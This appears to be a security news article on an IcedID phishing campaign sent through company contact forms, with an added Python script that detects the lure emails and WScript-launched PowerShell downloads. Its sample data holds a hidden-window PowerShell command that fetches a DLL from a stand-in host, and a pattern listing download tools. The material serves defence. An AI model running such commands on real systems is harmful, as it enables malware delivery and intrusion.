Cyber attackers are using company website contact forms to deliver the IcedID info-stealing malware, Microsoft has warned.
The attack involves phishing emails with fake legal threats that attempt to manipulate recipients into clicking a link in the email to review the supposed evidence behind the allegations; clicking the link instead downloads the IcedID malware.
IcedID (BokBot) is a banking trojan first spotted in 2017. The trojan targets user financial information and is capable of acting as a dropper for other malware.
This phishing campaign, detected by the Microsoft 365 Defender Threat Intelligence Team, appears to have found a way to circumvent the CAPTCHA protection on contact forms in order to flood organizations with phishing emails.
“Attackers are abusing legitimate infrastructure, such as websites’ contact forms, to bypass protections, making this threat highly evasive. In addition, attackers use legitimate URLs, in this case Google URLs that require targets to sign in with their Google credentials,” the threat intelligence team wrote. “The emails are being used to deliver the IcedID malware, which can be used for reconnaissance and data exfiltration, and can lead to additional malware payloads, including ransomware.”
The malicious messages that arrive in the recipient’s inbox from the contact form query seem trustworthy because they are sent by trusted email marketing systems. The emails originate from the recipient’s own website contact form, so they appear to be a genuine customer interaction or inquiry.
The phishing message also contains a link to a sites.google.com page where the recipient can supposedly view the allegedly stolen photos. When the victim clicks the link, they are presented with a Google page that requires them to sign in with their Google credentials.
After the victim signs in, the Google Sites page automatically downloads a malicious ZIP file containing a heavily obfuscated .js file. The .js file is executed via WScript, which creates a shell object to launch PowerShell; PowerShell then downloads the IcedID payload, which is decrypted by a dropped DLL loader, along with a Cobalt Strike beacon in the form of a stageless DLL, giving attackers remote control of the compromised device.
If the Google Sites page is unavailable, the attackers fall back to a secondary attack chain that redirects users to a .top domain, which in turn accesses a Google User Content page that downloads the malicious ZIP file.
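As an added example (not code from Microsoft's report or from this article), the following Python script sketches defender-side detection for the two stages described above: it flags contact-form notification emails that pair legal-threat wording with a sites.google.com link, and host process telemetry in which wscript.exe spawns powershell.exe with a download command. All log lines, hostnames, sender addresses and URLs are constructed for illustration.

```python
import json
import re

# Constructed sample events (not real campaign data), one JSON object per line.
# "mail" events come from a mail gateway; "process" events from endpoint telemetry.
SAMPLE_EVENTS = r"""
{"source":"mail","from":"noreply@marketing.example","subject":"Re: Contact form submission","body":"You used my photos without permission. Legal action will follow. Evidence: https://sites.google.com/view/evidence-123"}
{"source":"mail","from":"noreply@marketing.example","subject":"Re: Contact form submission","body":"Hi, do you ship to Canada? Thanks!"}
{"source":"process","host":"ws01","parent":"C:\\Windows\\System32\\wscript.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -w hidden -c iwr http://example.invalid/a.dll -OutFile $env:TEMP\\a.dll"}
{"source":"process","host":"ws02","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell Get-Date"}
"""

# Stage 1 (lure): legal-threat wording plus a Google Sites link in a contact-form reply.
LEGAL_THREAT = re.compile(r"\b(legal action|lawsuit|copyright|stolen|without permission)\b", re.I)
GOOGLE_SITES = re.compile(r"https?://sites\.google\.com/\S+", re.I)
# Stage 2 (loader): WScript-launched PowerShell that fetches something from the network.
DOWNLOAD_CMD = re.compile(r"(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget|bitsadmin|https?://)", re.I)


def detect(lines):
    """Return one finding dict per suspicious event, in input order."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev["source"] == "mail":
            body = ev.get("body", "")
            link = GOOGLE_SITES.search(body)
            if link and LEGAL_THREAT.search(body):
                findings.append({"stage": "lure", "detail": link.group(0)})
        elif ev["source"] == "process":
            # Compare on the executable name only, ignoring the directory.
            parent = ev["parent"].lower().rsplit("\\", 1)[-1]
            image = ev["image"].lower().rsplit("\\", 1)[-1]
            if parent == "wscript.exe" and image == "powershell.exe" and DOWNLOAD_CMD.search(ev["cmdline"]):
                findings.append({"stage": "loader", "detail": f'{ev["host"]}: {parent} -> {image}'})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS.splitlines()):
        print(f["stage"], f["detail"])
```

Run against real telemetry, the process rule would be fed from a process-creation source such as Sysmon event ID 1 or EDR data, and the mail rule from the gateway that relays contact-form notifications.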
“While this specific campaign delivers the IcedID malware, the delivery method can be used to distribute a wide range of other malware, which can in turn introduce other threats to the enterprise. IcedID itself is a banking trojan that has evolved to become an entry point for more sophisticated threats, including human-operated ransomware. It connects to a command-and-control server and downloads additional implants and tools that allow attackers to perform hands-on-keyboard attacks, steal credentials, move laterally across affected networks and deliver additional payloads,” Microsoft said.